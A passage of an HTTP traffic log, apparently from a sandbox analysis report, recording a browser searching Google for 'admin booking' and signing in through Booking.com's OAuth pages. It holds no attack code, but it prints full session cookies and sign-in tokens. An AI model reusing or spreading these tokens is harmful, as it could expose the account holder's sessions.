CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/search?q=admin+booking&oq=admin+bookin&gs_lcrp=EgZjaHJvbWUqBwgBEAAYgAQyBggAEEUYOTIHCAEQABiABDIHCAIQABiABDIJCAMQABgKGIAEMgkIBBAAGAoYgAQyCQgFEAAYChiABDIHCAYQABiABDIHCAcQABiABDIHCAgQABiABDIHCAkQABiABNIBCDcxMjdqMGo3qAIAsAIA&sourceid=chrome&ie=UTF-8&sei=vVGOZ-HkHNmChbIP4vXCoQEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=QPCyWcJf8Eo9O5cabvbpn_gRxL_r8CrZmMf8Pxh0h_Ct27_oBsrkaI14j1aVAK53LMgqASB_D6lRzEM7dXMXJ-vHbemQzG85BKceHybZaEzajEnLzhfppSOHGX3wQME7CCEJD9ai9-NGHUp1PvUzyAemrkPToORXAIgDM82DNXd1d2JeOMHbEIMvGqBq9D1w8QTQe9j3haRHtHtduW1n_nQ3xUYWK6OuOERxKn6G-8fsHWlzoXC3e7FV
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: admin.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /compressiontest/gzip.html HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=DryTa1izcbB7uTI6AG4j9FyEt5FlqpNZgX_9IlTe6FaBxOrEAB9ep7znxaJvpBxDpw-rj430G7eU2EgqYOMFtqse47g2ywoYlChuClFtevZ8Nqf0NjVyfRRXtjUiXUP1-TXzxy1QNI0wAR2-eN4SIIaOiPsC1C5iBguq_BRRqaJfeSWHMdkt_JvsNJaUFnZ42NIv8mRp-BuJw3qsMpk2aC9v_di7iAE8Y9_uHMP0t41QQlGVJBqvzXYlbw1qCA; GZ=Z=0
Source: global traffic	HTTP traffic detected: GET /complete/search?q&cp=0&client=gws-wiz-serp&xssi=t&gs_pcrt=2&hl=en&authuser=0&pq=admin%20booking&psi=vlGOZ7HnNNuphbIP5vyi8QQ.1737380290233&dpr=1&ofp=GKy7jb3EpLCBaRiv3ZfRyYDRq_4BGI3W07HI-d_mxgEYgvLo7fia56lxGJSq6r3AwMGQLQ&nolsbt=1 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=DryTa1izcbB7uTI6AG4j9FyEt5FlqpNZgX_9IlTe6FaBxOrEAB9ep7znxaJvpBxDpw-rj430G7eU2EgqYOMFtqse47g2ywoYlChuClFtevZ8Nqf0NjVyfRRXtjUiXUP1-TXzxy1QNI0wAR2-eN4SIIaOiPsC1C5iBguq_BRRqaJfeSWHMdkt_JvsNJaUFnZ42NIv8mRp-BuJw3qsMpk2aC9v_di7iAE8Y9_uHMP0t41QQlGVJBqvzXYlbw1qCA; GZ=Z=0
Source: global traffic	HTTP traffic detected: GET /oauth2/authorize?code_challenge_method=S256&code_challenge=Ny6ZgPZDAKpdIuWn5QlMOE38u1WS0Ji_LsDd1DQZzIo&redirect_uri=https%3A%2F%2Fadmin.booking.com%2F&client_id=6Z72oHOd36Nn7zk3pirh&response_type=code&dt=1737380291&state=%7B%22auth_attempt_id%22%3A%2284c7bad5-753b-4f43-a34c-819a37792d3d%22%7D HTTP/1.1Host: account.booking.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D
Source: global traffic	HTTP traffic detected: GET /complete/search?q=admin%20booking&cp=0&client=desktop-gws-wiz-on-focus-serp&xssi=t&gs_pcrt=3&hl=en&authuser=0&pq=admin%20booking&psi=vlGOZ7HnNNuphbIP5vyi8QQ.1737380290233&dpr=1&ofp=EAEYrLuNvcSksIFpGK_dl9HJgNGr_gEYjdbTscj53-bGARiC8ujt-JrnqXEYlKrqvcDAwZAtMr0BChwKGmFkbWluLmJvb2tpbmcuY29tIGV4dHJhbmV0ChIKEGV4dHJhbmV0IGJvb2tpbmcKEAoOZXh0cmFuZXQgbG9naW4KGgoYYm9va2luZy5jb20gZXh0cmFuZXQgYXBwChIKEGV4cGVkaWEgZXh0cmFuZXQKGQoXYWRtaW4uYm9va2luZy5jb20gaG90ZWwKEwoRYm9va2luZy5jb20gbG9naW4KFQoTcHVsc2UgYm9va2luZyBsb2dpbhBH HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=DryTa1izcbB7uTI6AG4j9FyEt5FlqpNZgX_9IlTe6FaBxOrEAB9ep7znxaJvpBxDpw-rj430G7eU2EgqYOMFtqse47g2ywoYlChuClFtevZ8Nqf0NjVyfRRXtjUiXUP1-TXzxy1QNI0wAR2-eN4SIIaOiPsC1C5iBguq_BRRqaJfeSWHMdkt_JvsNJaUFnZ42NIv8mRp-BuJw3qsMpk2aC9v_di7iAE8Y9_uHMP0t41QQlGVJBqvzXYlbw1qCA; GZ=Z=0
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.s.en.H22AvBquQQ0.2018.O/ck=xjs.s.COjAbpxNAqc.L.B1.O/am=AJA6BAgBAAAgAACAEAAqAAgAAAAAAAAAAAAAAAAAAAAAAAAAACABAAAAQkAAAAAAABAAACAQBQFImQAAAIJTAACwAwAAAAD4ABJxKgABAAABASBASAgAgAAAAYAAsBACAAgsAIEBIAgAACAAgAMAAASAQARgv_85MACAAQAAAAJAhIAQAQRgAQCFC4CEoPz9AIkfABQQAgABACAAAIAS8AAMAyCoABjgAUIAAABAAAAAAAAAgEAAIQAAGIDSDyCAAAA9AASADwBAEkQAgCEDAAMUApDADwAgAAAAABwBEAgABAhXADgGBiAAAAAAAAAA9wDweEA4pLAAAAAAAAAAAAAAAACAACQI5kD6CwIQAAAAAAAAAAAAAAAAAABAiqCJyw0ACA/d=0/dg=0/br=1/ujg=1/rs=ACT90oFCrETyrl5g88z6tkpPaR3XvbOa8w/m=sy3ms,syxx,Zby8rf,sy41b,w4UyN,sy454,sy453,sy452,sy451,SJpD2c,sy63i,sy5xg,sy18j,sy18i,sy18f,sy18k,sy17g,sy18h,sy13f,sy139,sy132,sy134,syau,sybc,sy58w,sy2fk,sy2fe,sy29c,sydb,syd9,sybk,sybi,syb4,sybh,syb7,syb6,sybe,sybb,syb5,syaj,sya7,sy1md,syyg,syuj,syfz,bEGPrc,sy1n8,sy63k,sy63j,mBG1hd,sy63l,mscaJf,sy63p,sGwFce,HxbScf,eAR4Hf,sy63q,h3zgVb,lRePd,sy44v,nN2e1e,sy63m,sy63r,sy221,IRJCef,sy63o,sy63n,scFHte,pr5okc,IFqxxc,sy44w,OXpAmf,sy63s,sy41d,sy416,sy415,sy1mf,sy1mg,sy19q,sy19o,sy19p,sy19l,sy19m,sy19j,sy19i,sy19d,sy19k,syzo,syzp,syzn,syzq,syzm,syzr,syze,syzd,syzf,syzs,syzt,GElbSc,syti,sytf,syte,sytd,sytc,DPreE,sy645,xdV1C,sy6bq,HYSCof,PGyklf,sy478,sy476,sy477,pzkXnb,sy41s,sy1pv,syww,FRLJrd,sy479,sy47a,eBYPP,sy63z,sHZ92c,sy6uw,sy3k7,sy27d,sy1k5,KSk4yc,sy3jj,msmzHf,sy7m8,sy2zm,SC7lYd,sy7rw,pHXghd?xjs=s3 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=DryTa1izcbB7uTI6AG4j9FyEt5FlqpNZgX_9IlTe6FaBxOrEAB9ep7znxaJvpBxDpw-rj430G7eU2EgqYOMFtqse47g2ywoYlChuClFtevZ8Nqf0NjVyfRRXtjUiXUP1-TXzxy1QNI0wAR2-eN4SIIaOiPsC1C5iBguq_BRRqaJfeSWHMdkt_JvsNJaUFnZ42NIv8mRp-BuJw3qsMpk2aC9v_di7iAE8Y9_uHMP0t41QQlGVJBqvzXYlbw1qCA; GZ=Z=0
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/md=2/k=xjs.s.en.H22AvBquQQ0.2018.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAACAABQEIAAAAAABQAAAAAAAAAAAAABIAAAAAAAABASBASAgAgAAAAAAAsAAAAAgsAIEBAAAAAAAAAAIAAACAQARgv_84AAAAAAAAAAAAgAAQAQAAAACACwCAIKjdAAEAAAAAAgAAACAAAAAQAAAAAACgAAAAAAIAAABAAAAAAAAAAEAAAAAACADQDwAAAAAAAAAAAAAAEAAAAAACAAMUABDADwAAAAAAABwAAAAABAgAADgGBiAAAAAAAAAA9wDweEA4pLAAAAAAAAAAAAAAAACAACQI5kD6CwIQAAAAAAAAAAAAAAAAAABAiqCJyw0ACA/rs=ACT90oGGEUo7u1V13_2NKhQAMmblL9Y68Q HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=DryTa1izcbB7uTI6AG4j9FyEt5FlqpNZgX_9IlTe6FaBxOrEAB9ep7znxaJvpBxDpw-rj430G7eU2EgqYOMFtqse47g2ywoYlChuClFtevZ8Nqf0NjVyfRRXtjUiXUP1-TXzxy1QNI0wAR2-eN4SIIaOiPsC1C5iBguq_BRRqaJfeSWHMdkt_JvsNJaUFnZ42NIv8mRp-BuJw3qsMpk2aC9v_di7iAE8Y9_uHMP0t41QQlGVJBqvzXYlbw1qCA; GZ=Z=0
Source: global traffic	HTTP traffic detected: GET /sign-in?op_token=EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiODRjN2JhZDUtNzUzYi00ZjQzLWEzNGMtODE5YTM3NzkyZDNkIn0yK055NlpnUFpEQUtwZEl1V241UWxNT0UzOHUxV1MwSmlfTHNEZDFEUVp6SW86BFMyNTZCBGNvZGUqEzCupfK7z8AnOgBCAFi1zL2fyDI HTTP/1.1Host: account.booking.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.s.en.H22AvBquQQ0.2018.O/ck=xjs.s.COjAbpxNAqc.L.B1.O/am=AJA6BAgBAAAgAACAEAAqAAgAAAAAAAAAAAAAAAAAAAAAAAAAACABAAAAQkAAAAAAABAAACAQBQFImQAAAIJTAACwAwAAAAD4ABJxKgABAAABASBASAgAgAAAAYAAsBACAAgsAIEBIAgAACAAgAMAAASAQARgv_85MACAAQAAAAJAhIAQAQRgAQCFC4CEoPz9AIkfABQQAgABACAAAIAS8AAMAyCoABjgAUIAAABAAAAAAAAAgEAAIQAAGIDSDyCAAAA9AASADwBAEkQAgCEDAAMUApDADwAgAAAAABwBEAgABAhXADgGBiAAAAAAAAAA9wDweEA4pLAAAAAAAAAAAAAAAACAACQI5kD6CwIQAAAAAAAAAAAAAAAAAABAiqCJyw0ACA/d=0/dg=0/br=1/ujg=1/rs=ACT90oFCrETyrl5g88z6tkpPaR3XvbOa8w/m=UMk45c,bplExb,nMfLA,O19q8,xMHx5e,R6UkWb,tW711b,UX8qee,tDA9G,sy3hq,sy3hn,sy3hm,sy3hl,syym,syyl,sy16r,syyz,syyk,syyy,syyn,syyo,sy2z9,sy2za,sy2zb,sy16n,sy1aa,sy1ab,sy16o,sy444,sy443,sy3hj,sy16l,sy164,sy12v,sy12w,sy12t,sy12r,sy2zc,sy16u,sy16t,sy16h,sy16v,sy16f,sy16e,sy16g,sy163,Eox39d,sy8b,sy8a,syig,syic,syid,syib,syip,syin,syim,syil,syih,syia,syc5,syc0,sye6,sye7,sycq,sycl,syce,sych,sycg,sycd,syc3,sycb,sycj,syco,sycm,syc8,syby,syc6,syc4,sycp,syc2,sybs,sybp,syb2,syax,sybn,syah,syej,syb9,syb3,syb8,sye9,sye3,sydr,sydv,sydf,sydg,sydm,sydl,sydd,syag,syaf,syde,syd5,syd4,sydk,sydh,syd3,syd2,syd1,sycy,sycz,syd0,sycv,syct,sycu,sycw,sybr,sybv,sydi,syi0,syi9,syi5,syi6,sy8z,sy8v,sy8y,syi2,syg5,syi7,syi1,syhz,syhw,syhv,syht,sy92,uxMpU,syhl,syem,sydo,syeg,syei,syea,syek,syed,sybu,sycx,syee,sye4,sy9j,sy9i,sy9h,sy9g,Mlhmy,QGR0gd,OTA3Ae,sy8c,EEDORb,PoEs9b,Pjplud,sy9d,sy99,sy97,A1yn5d,YIZmRd,uY49fb,sy80,sy7t,sy7z,sy7y,sy7w,byfTOb,lsjVmc,LEikZe,kWgXee,ovKuLd,sgY6Zb,sy9t,sy9r,sy91,xUdipf,NwH0H,gychg,ZfAoz,yDVVkb,qafBPd,ebZ3mb,dowIGb,sy6c2,sy426,DpX64d,uKlGbf,sy6c3,EufiNb,sy3mp,JfINdf,sy3mo,gHhSjd,sy3mq,uUzMF,sy3mu?xjs=s3 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=DryTa1izcbB7uTI6AG4j9FyEt5FlqpNZgX_9IlTe6FaBxOrEAB9ep7znxaJvpBxDpw-rj430G7eU2EgqYOMFtqse47g2ywoYlChuClFtevZ8Nqf0NjVyfRRXtjUiXUP1-TXzxy1QNI0wAR2-eN4SIIaOiPsC1C5iBguq_BRRqaJfeSWHMdkt_JvsNJaUFnZ42NIv8mRp-BuJw3qsMpk2aC9v_di7iAE8Y9_uHMP0t41QQlGVJBqvzXYlbw1qCA; GZ=Z=0
Source: global traffic	HTTP traffic detected: GET /client_204?atyp=i&biw=1034&bih=870&ei=vlGOZ7HnNNuphbIP5vyi8QQ&opi=89978449 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=DryTa1izcbB7uTI6AG4j9FyEt5FlqpNZgX_9IlTe6FaBxOrEAB9ep7znxaJvpBxDpw-rj430G7eU2EgqYOMFtqse47g2ywoYlChuClFtevZ8Nqf0NjVyfRRXtjUiXUP1-TXzxy1QNI0wAR2-eN4SIIaOiPsC1C5iBguq_BRRqaJfeSWHMdkt_JvsNJaUFnZ42NIv8mRp-BuJw3qsMpk2aC9v_di7iAE8Y9_uHMP0t41QQlGVJBqvzXYlbw1qCA; GZ=Z=0
Source: global traffic	HTTP traffic detected: GET /consent/a387750c-a080-4dd0-b2d1-7dbdb601bb14/OtAutoBlock.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /psb/accountsportal/assets/186_c32002792e35c69191e8.css HTTP/1.1Host: cf.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /psb/accountsportal/assets/815_9a0ec8d2f80e7d346616.css HTTP/1.1Host: cf.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /psb/accountsportal/assets/57_a194fd9bf3b476d89299.css HTTP/1.1Host: cf.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
